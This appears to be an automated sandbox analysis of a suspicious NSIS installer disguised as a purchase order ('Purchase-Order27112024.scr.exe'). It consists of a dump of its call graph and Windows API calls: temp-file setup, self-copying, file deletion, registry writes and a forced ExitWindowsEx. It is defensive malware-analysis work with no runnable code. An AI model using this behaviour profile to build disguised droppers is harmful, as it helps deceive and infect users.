4599->4528 4599->4532 4599->4536 4600->4598 4604 100023de 4600->4604 4601->4598 4602->4598 4604->4598 4668 100025d9 4604->4668 4607 100028b6 4605->4607 4606 1000295b EnumWindows 4608 10002979 4606->4608 4607->4606 4609 10002a75 4608->4609 4610 10002a6a GetLastError 4608->4610 4609->4528 4610->4609 4612 10002296 4611->4612 4614 100017a7 4611->4614 4613 100022a8 GlobalAlloc 4612->4613 4612->4614 4613->4612 4614->4523 4619 10002661 4615->4619 4616 100026b2 GlobalAlloc 4620 100026d4 4616->4620 4617 100026c5 4618 100026ca GlobalSize 4617->4618 4617->4620 4618->4620 4619->4616 4619->4617 4620->4548 4622 10002b6a 4621->4622 4623 10002baa GlobalFree 4622->4623 4671 1000121b GlobalAlloc 4624->4671 4626 10002530 StringFromGUID2 4629 100024b3 4626->4629 4627 10002541 lstrcpynW 4627->4629 4628 1000250b MultiByteToWideChar 4628->4629 4629->4626 4629->4627 4629->4628 4630 10002554 wsprintfW 4629->4630 4631 10002571 GlobalFree 4629->4631 4632 100025ac GlobalFree 4629->4632 4633 10001272 2 API calls 4629->4633 4672 100012e1 4629->4672 4630->4629 4631->4629 4632->4537 4633->4629 4676 1000121b GlobalAlloc 4635->4676 4637 100015ba 4638 100015c7 lstrcpyW 4637->4638 4640 100015e1 4637->4640 4641 100015fb 4638->4641 4640->4641 4642 100015e6 wsprintfW 4640->4642 4643 10001272 4641->4643 4642->4641 4644 100012b5 GlobalFree 4643->4644 4645 1000127b GlobalAlloc lstrcpynW 4643->4645 4644->4546 4645->4644 4647 10001861 4646->4647 4648 1000247a 4646->4648 4647->4556 4647->4557 4648->4647 4649 10002496 GlobalFree 4648->4649 4649->4648 4651 10001272 2 API calls 4650->4651 4652 1000155e 4651->4652 4652->4550 4653->4564 4654->4568 4656 100015ad 4655->4656 4656->4592 4663 1000121b GlobalAlloc 4657->4663 4659 1000123b lstrcpynW 4659->4578 4660->4568 4661->4588 4662->4589 4663->4659 4665 100012c1 4664->4665 4666 1000122c 2 API calls 4665->4666 4667 100012df 4666->4667 4667->4596 4669 100025e7 VirtualAlloc 4668->4669 4670 1000263d 4668->4670 4669->4670 4670->4604 4671->4629 4673 100012ea 4672->4673 4674 1000130c 4672->4674 4673->4674 4675 100012f0 lstrcpyW 4673->4675 4674->4629 4675->4674 4676->4637 5425 10001058 5427 10001074 5425->5427 5426 100010dd 5427->5426 5428 10001092 5427->5428 5429 10001516 GlobalFree 5427->5429 5430 10001516 GlobalFree 5428->5430 5429->5428 5431 100010a2 5430->5431 5432 100010b2 5431->5432 5433 100010a9 GlobalSize 5431->5433 5434 100010b6 GlobalAlloc 5432->5434 5435 100010c7 5432->5435 5433->5432 5436 1000153d 3 API calls 5434->5436 5437 100010d2 GlobalFree 5435->5437 5436->5435 5437->5426 5438 40159b 5439 402b3a 18 API calls 5438->5439 5440 4015a2 SetFileAttributesW 5439->5440 5441 4015b4 5440->5441 5442 40659d 5443 406421 5442->5443 5444 406d8c 5443->5444 5445 4064a2 GlobalFree 5443->5445 5446 4064ab GlobalAlloc 5443->5446 5447 406522 GlobalAlloc 5443->5447 5448 406519 GlobalFree 5443->5448 5445->5446 5446->5443 5446->5444 5447->5443 5447->5444 5448->5447 5449 40149e 5450 4014ac PostQuitMessage 5449->5450 5451 40223e 5449->5451 5450->5451 5452 4021a0 5453 402b3a 18 API calls 5452->5453 5454 4021a6 5453->5454 5455 402b3a 18 API calls 5454->5455 5456 4021af 5455->5456 5457 402b3a 18 API calls 5456->5457 5458 4021b8 5457->5458 5459 40628b 2 API calls 5458->5459 5460 4021c1 5459->5460 5461 4021d2 lstrlenW lstrlenW 5460->5461 5465 4021c5 5460->5465 5462 4051f2 25 API calls 5461->5462 5464 402210 SHFileOperationW 5462->5464 5463 4051f2 25 API calls 5466 4021cd 5463->5466 5464->5465 5464->5466 5465->5463 5465->5466 5467 100010e1 5476 10001111 5467->5476 5468 100011d8 GlobalFree 5469 100012ba 2 API calls 5469->5476 5470 100011d3 5470->5468 5471 10001164 GlobalAlloc 5471->5476 5472 100011f8 GlobalFree 5472->5476 5473 10001272 2 API calls 5475 100011c4 GlobalFree 5473->5475 5474 100012e1 lstrcpyW 5474->5476 5475->5476 5476->5468 5476->5469 5476->5470 5476->5471 5476->5472 5476->5473 5476->5474 5476->5475 5477 401b22 5478 401b73 5477->5478 5479 401b2f 5477->5479 5480 401b78 5478->5480 5481 401b9d GlobalAlloc 5478->5481 5484 401bb8 5479->5484 5485 401b46 5479->5485 5490 40223e 5480->5490 5498 405f48 lstrcpynW 5480->5498 5483 405f6a 18 API calls 5481->5483 5482 405f6a 18 API calls 5486 402238 5482->5486 5483->5484 5484->5482 5484->5490 5496 405f48 lstrcpynW 5485->5496 5492 405724 MessageBoxIndirectW 5486->5492 5489 401b8a GlobalFree 5489->5490 5491 401b55 5497 405f48 lstrcpynW 5491->5497 5492->5490 5494 401b64 5499 405f48 lstrcpynW 5494->5499 5496->5491 5497->5494 5498->5489 5499->5490 5500 4029a2 SendMessageW 5501 4029c7 5500->5501 5502 4029bc InvalidateRect 5500->5502 5502->5501 4087 401924 4088 401926 4087->4088 4093 402b3a 4088->4093 4094 402b46 4093->4094 4095 405f6a 18 API calls 4094->4095 4097 402b67 4095->4097 4096 40192b 4099 4057d0 4096->4099 4097->4096 4098 4061dc 5 API calls 4097->4098 4098->4096 4138 405a9b 4099->4138 4102 4057f8 DeleteFileW 4104 401934 4102->4104 4103 40580f 4105 40593a 4103->4105 4152 405f48 lstrcpynW 4103->4152 4105->4104 4182 40628b FindFirstFileW 4105->4182 4107 405835 4108 405848 4107->4108 4109 40583b lstrcatW 4107->4109 4153 4059df lstrlenW 4108->4153 4110 40584e 4109->4110 4113 40585e lstrcatW 4110->4113 4115 405869 lstrlenW FindFirstFileW 4110->4115 4113->4115 4117 40592f 4115->4117 4119 40588b 4115->4119 4116 405958 4185 405993 lstrlenW CharPrevW 4116->4185 4117->4105 4123 405912 FindNextFileW 4119->4123 4131 4057d0 64 API calls 4119->4131 4133 4051f2 25 API calls 4119->4133 4157 405f48 lstrcpynW 4119->4157 4158 405788 4119->4158 4166 4051f2 4119->4166 4177 405de2 4119->4177 4121 405788 5 API calls 4124 40596a 4121->4124 4123->4119 4125 405928 FindClose 4123->4125 4126 405984 4124->4126 4127 40596e 4124->4127 4125->4117 4129 4051f2 25 API calls 4126->4129 4127->4104 4130 4051f2 25 API calls 4127->4130 4129->4104 4132 40597b 4130->4132 4131->4119 4134 405de2 40 API calls 4132->4134 4133->4123 4135 405982 4134->4135 4135->4104 4188 405f48 lstrcpynW 4138->4188 4140 405aac 4189 405a3e CharNextW CharNextW 4140->4189 4143 4057f0 4143->4102 4143->4103 4144 4061dc 5 API calls 4150 405ac2 4144->4150 4145 405af3 lstrlenW 4146 405afe 4145->4146 4145->4150 4148 405993 3 API calls 4146->4148 4147 40628b 2 API calls 4147->4150 4149 405b03 GetFileAttributesW 4148->4149 4149->4143 4150->4143 4150->4145 4150->4147 4151 4059df 2 API calls 4150->4151 4151->4145 4152->4107 4154 4059ed 4153->4154 4155 4059f3 CharPrevW 4154->4155 4156 4059ff 4154->4156 4155->4154 4155->4156 4156->4110 4157->4119 4195 405b8f GetFileAttributesW 4158->4195 4161 4057b5 4161->4119 4162 4057a3 RemoveDirectoryW 4164 4057b1 4162->4164 4163 4057ab DeleteFileW 4163->4164 4164->4161 4165 4057c1 SetFileAttributesW 4164->4165 4165->4161 4167 40520d 4166->4167 4168 4052af 4166->4168 4169 405229 lstrlenW 4167->4169 4170 405f6a 18 API calls 4167->4170 4168->4119 4171 405252 4169->4171 4172 405237 lstrlenW 4169->4172 4170->4169 4174 405265 4171->4174 4175 405258 SetWindowTextW 4171->4175 4172->4168 4173 405249 lstrcatW 4172->4173 4173->4171 4174->4168 4176 40526b SendMessageW SendMessageW SendMessageW 4174->4176 4175->4174 4176->4168 4198 4062b2 GetModuleHandleA 4177->4198 4181 405e0a 4181->4119 4183 4062a1 FindClose 4182->4183 4184 405954 4182->4184 4183->4184 4184->4104 4184->4116 4186 40595e 4185->4186 4187 4059af lstrcatW 4185->4187 4186->4121 4187->4186 4188->4140 4190 405a5b 4189->4190 4193 405a6d 4189->4193 4192 405a68 CharNextW 4190->4192 4190->4193 4191 405a91 4191->4143 4191->4144 4192->4191 4193->4191 4194 4059c0 CharNextW 4193->4194 4194->4193 4196 405ba1 SetFileAttributesW 4195->4196 4197 405794 4195->4197 4196->4197 4197->4161 4197->4162 4197->4163 4199 4062d9 GetProcAddress 4198->4199 4200 4062ce LoadLibraryA 4198->4200 4201 405de9 4199->4201 4200->4199 4200->4201 4201->4181 4202 405c66 lstrcpyW 4201->4202 4203 405cb5 GetShortPathNameW 4202->4203 4204 405c8f 4202->4204 4206 405cca 4203->4206 4207 405ddc 4203->4207 4227 405bb4 GetFileAttributesW CreateFileW 4204->4227 4206->4207 4209 405cd2 wsprintfA 4206->4209 4207->4181 4208 405c99 CloseHandle GetShortPathNameW 4208->4207 4210 405cad 4208->4210 4211 405f6a 18 API calls 4209->4211 4210->4203 4210->4207 4212 405cfa 4211->4212 4228 405bb4 GetFileAttributesW CreateFileW 4212->4228 4214 405d07 4214->4207 4215 405d16 GetFileSize GlobalAlloc 4214->4215 4216 405dd5 CloseHandle 4215->4216 4217 405d38 4215->4217 4216->4207 4229 405c37 ReadFile 4217->4229 4222 405d57 lstrcpyA 4225 405d79 4222->4225 4223 405d6b 4224 405b19 4 API calls 4223->4224 4224->4225 4226 405db0 SetFilePointer WriteFile GlobalFree 4225->4226 4226->4216 4227->4208 4228->4214 4230 405c55 4229->4230 4230->4216 4231 405b19 lstrlenA 4230->4231 4232 405b5a lstrlenA 4231->4232 4233 405b62 4232->4233 4234 405b33 lstrcmpiA 4232->4234 4233->4222 4233->4223 4234->4233 4235 405b51 CharNextA 4234->4235 4235->4232 5503 402224 5504 40223e 5503->5504 5505 40222b 5503->5505 5506 405f6a 18 API calls 5505->5506 5507 402238 5506->5507 5508 405724 MessageBoxIndirectW 5507->5508 5508->5504 5516 402729 5517 402730 5516->5517 5518 4029c7 5516->5518 5519 402736 FindClose 5517->5519 5519->5518 5520 401cab 5521 402b1d 18 API calls 5520->5521 5522 401cb2 5521->5522 5523 402b1d 18 API calls 5522->5523 5524 401cba GetDlgItem 5523->5524 5525 4024e8 5524->5525 5526 4042ae lstrcpynW lstrlenW 5527 4016af 5528 402b3a 18 API calls 5527->5528 5529 4016b5 GetFullPathNameW 5528->5529 5530 4016f1 5529->5530 5531 4016cf 5529->5531 5532 401706 GetShortPathNameW 5530->5532 5533 4029c7 5530->5533 5531->5530 5534 40628b 2 API calls 5531->5534 5532->5533 5535 4016e1 5534->5535 5535->5530 5537 405f48 lstrcpynW 5535->5537 5537->5530 4250 402331 4251 402337 4250->4251 4252 402b3a 18 API calls 4251->4252 4253 402349 4252->4253 4254 402b3a 18 API calls 4253->4254 4255 402353 RegCreateKeyExW 4254->4255 4256 40237d 4255->4256 4258 402793 4255->4258 4257 402398 4256->4257 4259 402b3a 18 API calls 4256->4259 4260 402b1d 18 API calls 4257->4260 4263 4023a4 4257->4263 4262 40238e lstrlenW 4259->4262 4260->4263 4261 4023bf RegSetValueExW 4265 4023d5 RegCloseKey 4261->4265 4262->4257 4263->4261 4267 403062 4263->4267 4265->4258 4268 403072 SetFilePointer 4267->4268 4269 40308e 4267->4269 4268->4269 4282 40317d GetTickCount 4269->4282 4272 405c37 ReadFile 4273 4030ae 4272->4273 4274 40317d 43 API calls 4273->4274 4281 403139 4273->4281 4275 4030c5 4274->4275 4276 4030d5 4275->4276 4277 40313f ReadFile 4275->4277 4275->4281 4279 405c37 ReadFile 4276->4279 4280 403108 WriteFile 4276->4280 4276->4281 4277->4281 4279->4276 4280->4276 4280->4281 4281->4261 4283 4032e7 4282->4283 4284 4031ac 4282->4284 4285 402d1a 33 API calls 4283->4285 4295 40330f SetFilePointer 4284->4295 4291 403095 4285->4291 4287 4031b7 SetFilePointer 4293 4031dc 4287->4293 4291->4272 4291->4281 4292 403271 WriteFile 4292->4291 4292->4293 4293->4291 4293->4292 4294 4032c8 SetFilePointer 4293->4294 4296 4032f9 4293->4296 4299 4063ee 4293->4299 4306 402d1a 4293->4306 4294->4283 4295->4287 4297 405c37 ReadFile 4296->4297 4298 40330c 4297->4298 4298->4293 4300 406413 4299->4300 4303 40641b 4299->4303 4300->4293 4301 4064a2 GlobalFree 4302 4064ab GlobalAlloc 4301->4302 4302->4300 4302->4303 4303->4300 4303->4301 4303->4302 4304 406522 GlobalAlloc 4303->4304 4305 406519 GlobalFree 4303->4305 4304->4300 4304->4303 4305->4304 4307 402d43 4306->4307 4308 402d2b 4306->4308 4310 402d53 GetTickCount 4307->4310 4311 402d4b 4307->4311 4309 402d34 DestroyWindow 4308->4309 4314 402d3b 4308->4314 4309->4314 4313 402d61 4310->4313 4310->4314 4321 4062eb 4311->4321 4315 402d96 CreateDialogParamW ShowWindow 4313->4315 4316 402d69 4313->4316 4314->4293 4315->4314 4316->4314 4325 402cfe 4316->4325 4318 402d77 wsprintfW 4319 4051f2 25 API calls 4318->4319 4320 402d94 4319->4320 4320->4314 4322 406308 PeekMessageW 4321->4322 4323 406318 4322->4323 4324 4062fe DispatchMessageW 4322->4324 4323->4314 4324->4322 4326 402d0d 4325->4326 4327 402d0f MulDiv 4325->4327 4326->4327 4327->4318 4328 405331 4329 405352 GetDlgItem GetDlgItem GetDlgItem 4328->4329 4330 4054dd 4328->4330 4374 4041cf SendMessageW 4329->4374 4332 4054e6 GetDlgItem CreateThread CloseHandle 4330->4332 4333 40550e 4330->4333 4332->4333 4377 4052c5 OleInitialize 4332->4377 4335 405539 4333->4335 4336 405525 ShowWindow ShowWindow 4333->4336 4337 40555e 4333->4337 4334 4053c3 4340 4053ca GetClientRect GetSystemMetrics SendMessageW SendMessageW 4334->4340 4338 405545 4335->4338 4339 405599 4335->4339 4376 4041cf SendMessageW 4336->4376 4344 404201 8 API calls 4337->4344 4342 405573 ShowWindow 4338->4342 4343 40554d 4338->4343 4339->4337 4350 4055a7 SendMessageW 4339->4350 4348 405439 4340->4348 4349 40541d SendMessageW SendMessageW 4340->4349 4346 405593 4342->4346 4347 405585 4342->4347 4351 404173 SendMessageW 4343->4351 4345 40556c 4344->4345 4353 404173 SendMessageW 4346->4353 4352 4051f2 25 API calls 4347->4352 4354 40544c 4348->4354 4355 40543e SendMessageW 4348->4355 4349->4348 4350->4345 4356 4055c0 CreatePopupMenu 4350->4356 4351->4337 4352->4346 4353->4339 4358 40419a 19 API calls 4354->4358 4355->4354 4357 405f6a 18 API calls 4356->4357 4359 4055d0 AppendMenuW 4357->4359 4360 40545c 4358->4360 4361 405600 TrackPopupMenu 4359->4361 4362 4055ed GetWindowRect 4359->4362 4363 405465 ShowWindow 4360->4363 4364 405499 GetDlgItem SendMessageW 4360->4364 4361->4345 4366 40561b 4361->4366 4362->4361 4367 405488 4363->4367 4368 40547b ShowWindow 4363->4368 4364->4345 4365 4054c0 SendMessageW SendMessageW 4364->4365 4365->4345 4369 405637 SendMessageW 4366->4369 4375 4041cf SendMessageW 4367->4375 4368->4367 4369->4369 4370 405654 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4369->4370 4372 405679 SendMessageW 4370->4372 4372->4372 4373 4056a2 GlobalUnlock SetClipboardData CloseClipboard 4372->4373 4373->4345 4374->4334 4375->4364 4376->4335 4378 4041e6 SendMessageW 4377->4378 4379 4052e8 4378->4379 4382 40530f 4379->4382 4383 401389 2 API calls 4379->4383 4380 4041e6 SendMessageW 4381 405321 OleUninitialize 4380->4381 4382->4380 4383->4379 5538 404635 5539 404661 5538->5539 5540 404672 5538->5540 5599 405708 GetDlgItemTextW 5539->5599 5541 40467e GetDlgItem 5540->5541 5548 4046dd 5540->5548 5544 404692 5541->5544 5543 40466c 5546 4061dc 5 API calls 5543->5546 5547 4046a6 SetWindowTextW 5544->5547 5551 405a3e 4 API calls 5544->5551 5545 4047c1 5597 404955 5545->5597 5601 405708 GetDlgItemTextW 5545->5601 5546->5540 5552 40419a 19 API calls 5547->5552 5548->5545 5553 405f6a 18 API calls 5548->5553 5548->5597 5550 404201 8 API calls 5555 404969 5550->5555 5556 40469c 5551->5556 5557 4046c2 5552->5557 5558 404751 SHBrowseForFolderW 5553->5558 5554 4047f1 5559 405a9b 18 API calls 5554->5559 5556->5547 5563 405993 3 API calls 5556->5563 5560 40419a 19 API calls 5557->5560 5558->5545 5561 404769 CoTaskMemFree 5558->5561 5562 4047f7 5559->5562 5564 4046d0 5560->5564 5565 405993 3 API calls 5561->5565 5602 405f48 lstrcpynW 5562->5602 5563->5547 5600 4041cf SendMessageW 5564->5600 5567 404776 5565->5567 5570 4047ad SetDlgItemTextW 5567->5570 5574 405f6a 18 API calls 5567->5574 5569 4046d6 5572 4062b2 3 API calls 5569->5572 5570->5545 5571 40480e 5573 4062b2 3 API calls 5571->5573 5572->5548 5581 404816 5573->5581 5575 404795 lstrcmpiW 5574->5575 5575->5570 5577 4047a6 lstrcatW 5575->5577 5576 404855 5603 405f48 lstrcpynW 5576->5603 5577->5570 5579 40485c 5580 405a3e 4 API calls 5579->5580 5582 404862 GetDiskFreeSpaceW 5580->5582 5581->5576 5585 4059df 2 API calls 5581->5585 5586 4048a7 5581->5586 5584 404885 MulDiv 5582->5584 5582->5586 5584->5586 5585->5581 5587 4049d6 21 API calls 5586->5587 5596 404904 5586->5596 5588 4048f6 5587->5588 5591 404906 SetDlgItemTextW 5588->5591 5592 4048fb 5588->5592 5589 40140b 2 API calls 5590 404927 5589->5590 5604 4041bc KiUserCallbackDispatcher 5590->5604 5591->5596 5594 4049d6 21 API calls 5592->5594 5594->5596 5595 404943 5595->5597 5605 4045ca 5595->5605 5596->5589 5596->5590 5597->5550 5599->5543 5600->5569 5601->5554 5602->5571 5603->5579 5604->5595 5606 4045d8 5605->5606 5607 4045dd SendMessageW 5605->5607 5606->5607 5607->5597 5608 4027b5 5609 402b3a 18 API calls 5608->5609 5610 4027c3 5609->5610 5611 4027d9 5610->5611 5612 402b3a 18 API calls 5610->5612 5613 405b8f 2 API calls 5611->5613 5612->5611 5614 4027df 5613->5614 5634 405bb4 GetFileAttributesW CreateFileW 5614->5634 5616 4027ec 5617 402895 5616->5617 5618 4027f8 GlobalAlloc 5616->5618 5621 4028b0 5617->5621 5622 40289d DeleteFileW 5617->5622 5619 402811 5618->5619 5620 40288c CloseHandle 5618->5620 5635 40330f SetFilePointer 5619->5635 5620->5617 5622->5621 5624 402817 5625 4032f9 ReadFile 5624->5625 5626 402820 GlobalAlloc 5625->5626 5627 402830 5626->5627 5628 402864 WriteFile GlobalFree 5626->5628 5629 403062 46 API calls 5627->5629 5630 403062 46 API calls 5628->5630 5633 40283d 5629->5633 5631 402889 5630->5631 5631->5620 5632 40285b GlobalFree 5632->5628 5633->5632 5634->5616 5635->5624 5636 4028b6 5637 402b1d 18 API calls 5636->5637 5638 4028bc 5637->5638 5639 4028f8 5638->5639 5640 4028df 5638->5640 5644 402793 5638->5644 5642 402902 5639->5642 5643 40290e 5639->5643 5641 4028e4 5640->5641 5649 4028f5 5640->5649 5650 405f48 lstrcpynW 5641->5650 5645 402b1d 18 API calls 5642->5645 5646 405f6a 18 API calls 5643->5646 5645->5649 5646->5649 5649->5644 5651 405e8f wsprintfW 5649->5651 5650->5644 5651->5644 5652 404337 5653 40434f 5652->5653 5660 404469 5652->5660 5657 40419a 19 API calls 5653->5657 5654 4044d3 5655 4045a5 5654->5655 5656 4044dd GetDlgItem 5654->5656 5662 404201 8 API calls 5655->5662 5658 404566 5656->5658 5659 4044f7 5656->5659 5661 4043b6 5657->5661 5658->5655 5667 404578 5658->5667 5659->5658 5666 40451d 6 API calls 5659->5666 5660->5654 5660->5655 5663 4044a4 GetDlgItem SendMessageW 5660->5663 5664 40419a 19 API calls 5661->5664 5665 4045a0 5662->5665 5683 4041bc KiUserCallbackDispatcher 5663->5683 5670 4043c3 CheckDlgButton 5664->5670 5666->5658 5671 40458e 5667->5671 5672 40457e SendMessageW 5667->5672 5669 4044ce 5673 4045ca SendMessageW 5669->5673 5681 4041bc KiUserCallbackDispatcher 5670->5681 5671->5665 5675 404594 SendMessageW 5671->5675 5672->5671 5673->5654 5675->5665 5676 4043e1 GetDlgItem 5682 4041cf SendMessageW 5676->5682 5678 4043f7 SendMessageW 5679 404414 GetSysColor 5678->5679 5680 40441d SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5678->5680 5679->5680 5680->5665 5681->5676 5682->5678 5683->5669 5684 4014b8 5685 4014be 5684->5685 5686 401389 2 API calls 5685->5686 5687 4014c6 5686->5687 4686 4015b9 4687 402b3a 18 API calls 4686->4687 4688 4015c0 4687->4688 4689 405a3e 4 API calls 4688->4689 4696 4015c9 4689->4696 4690 401614 4692 401619 4690->4692 4693 401646 4690->4693 4691 4059c0 CharNextW 4694 4015d7 CreateDirectoryW 4691->4694 4695 401423 25 API calls 4692->4695 4698 401423 25 API calls 4693->4698 4694->4696 4697 4015ed GetLastError 4694->4697 4699 401620 4695->4699 4696->4690 4696->4691 4697->4696 4700 4015fa GetFileAttributesW 4697->4700 4703 40163e 4698->4703 4704 405f48 lstrcpynW 4699->4704 4700->4696 4702 40162d SetCurrentDirectoryW 4702->4703 4704->4702 5688 401939 5689 402b3a 18 API calls 5688->5689 5690 401940 lstrlenW 5689->5690 5691 4024e8 5690->5691 5692 40293b 5693 402b1d 18 API calls 5692->5693 5694 402941 5693->5694 5695 402974 5694->5695 5696 402793 5694->5696 5698 40294f 5694->5698 5695->5696 5697 405f6a 18 API calls 5695->5697 5697->5696 5698->5696 5700 405e8f wsprintfW 5698->5700 5700->5696 4916 40173f 4917 402b3a 18 API calls 4916->4917 4918 401746 4917->4918 4919 405be3 2 API calls 4918->4919 4920 40174d 4919->4920 4921 405be3 2 API calls 4920->4921 4921->4920 5708 10002a7f 5709 10002a97 5708->5709 5710 1000158f 2 API calls 5709->5710 5711 10002ab2 5710->5711

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 0 40335a-4033f2 #17 SetErrorMode OleInitialize call 4062b2 SHGetFileInfoW call 405f48 GetCommandLineW call 405f48 GetModuleHandleW 7 4033f4-4033f6 0->7 8 4033fb-40340f call 4059c0 CharNextW 0->8 7->8 11 40350a-403510 8->11 12 403414-40341a 11->12 13 403516 11->13 14 403423-40342a 12->14 15 40341c-403421 12->15 16 40352a-403544 GetTempPathW call 403326 13->16 17 403432-403436 14->17 18 40342c-403431 14->18 15->14 15->15 23 403546-403564 GetWindowsDirectoryW lstrcatW call 403326 16->23 24 40359c-4035b6 DeleteFileW call 402dbc 16->24 20 4034f7-403506 call 4059c0 17->20 21 40343c-403442 17->21 18->17 20->11 39 403508-403509 20->39 26 403444-40344b 21->26 27 40345c-403495 21->27 23->24 43 403566-403596 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403326 23->43 45 403667-403676 call 40382d OleUninitialize 24->45 46 4035bc-4035c2 24->46 31 403452 26->31 32 40344d-403450 26->32 33 4034b2-4034ec 27->33 34 403497-40349c 27->34 31->27 32->27 32->31 36 4034f4-4034f6 33->36 37 4034ee-4034f2 33->37 34->33 40 40349e-4034a6 34->40 36->20 37->36 44 403518-403525 call 405f48 37->44 39->11 41 4034a8-4034ab 40->41 42 4034ad 40->42 41->33 41->42 42->33 43->24 43->45 44->16 56 403772-403778 45->56 57 40367c-40368c call 405724 ExitProcess 45->57 48 403657-40365e call 40391f 46->48 49 4035c8-4035d3 call 4059c0 46->49 59 403663 48->59 63 403621-40362b 49->63 64 4035d5-40360a 49->64 61 403815-40381d 56->61 62 40377e-40379b call 4062b2 * 3 56->62 59->45 68 403823-403827 ExitProcess 61->68 69 40381f 61->69 92 4037e5-4037f3 call 4062b2 62->92 93 40379d-40379f 62->93 66 403692-4036ac lstrcatW lstrcmpiW 63->66 67 40362d-40363b call 405a9b 63->67 71 40360c-403610 64->71 66->45 73 4036ae-4036c4 CreateDirectoryW SetCurrentDirectoryW 66->73 67->45 83 40363d-403653 call 405f48 * 2 67->83 69->68 75 403612-403617 71->75 76 403619-40361d 71->76 79 4036d1-4036fa call 405f48 73->79 80 4036c6-4036cc call 405f48 73->80 75->76 77 40361f 75->77 76->71 76->77 77->63 91 4036ff-40371b call 405f6a DeleteFileW 79->91 80->79 83->48 102 40375c-403764 91->102 103 40371d-40372d CopyFileW 91->103 105 403801-40380c ExitWindowsEx 92->105 106 4037f5-4037ff 92->106 93->92 96 4037a1-4037a3 93->96 96->92 100 4037a5-4037b7 GetCurrentProcess 96->100 100->92 115 4037b9-4037db 100->115 102->91 104 403766-40376d call 405de2 102->104 103->102 107 40372f-40374f call 405de2 call 405f6a call 4056c3 103->107 104->45 105->61 109 40380e-403810 call 40140b 105->109 106->105 106->109 107->102 122 403751-403758 CloseHandle 107->122 109->61 115->92 122->102
                                                                                                      APIs
                                                                                                      • #17.COMCTL32 ref: 00403379
                                                                                                      • SetErrorMode.KERNELBASE(00008001), ref: 00403384
                                                                                                      • OleInitialize.OLE32(00000000), ref: 0040338B
                                                                                                        • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                                                                                        • Part of subcall function 004062B2: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000009), ref: 004062CF
                                                                                                        • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                                                                      • SHGetFileInfoW.SHELL32(004206A8,00000000,?,000002B4,00000000), ref: 004033B3
                                                                                                        • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55
                                                                                                      • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 004033C8
                                                                                                      • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Purchase-Order27112024.scr.exe",00000000), ref: 004033DB
                                                                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Purchase-Order27112024.scr.exe",00000020), ref: 00403403
                                                                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040353B
                                                                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040354C
                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403558
                                                                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040356C
                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403574
                                                                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403585
                                                                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040358D
                                                                                                      • DeleteFileW.KERNELBASE(1033), ref: 004035A1
                                                                                                      • OleUninitialize.OLE32(?), ref: 0040366C
                                                                                                      • ExitProcess.KERNEL32 ref: 0040368C
                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Purchase-Order27112024.scr.exe",00000000,?), ref: 00403698
                                                                                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Purchase-Order27112024.scr.exe",00000000,?), ref: 004036A4
                                                                                                      • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 004036B0
                                                                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 004036B7
                                                                                                      • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 00403711
                                                                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\Purchase-Order27112024.scr.exe,0041FEA8,00000001), ref: 00403725
                                                                                                      • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 00403752
                                                                                                      • GetCurrentProcess.KERNEL32(00000028,00000006,00000006,00000005,00000004), ref: 004037AC
                                                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403804
                                                                                                      • ExitProcess.KERNEL32 ref: 00403827
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
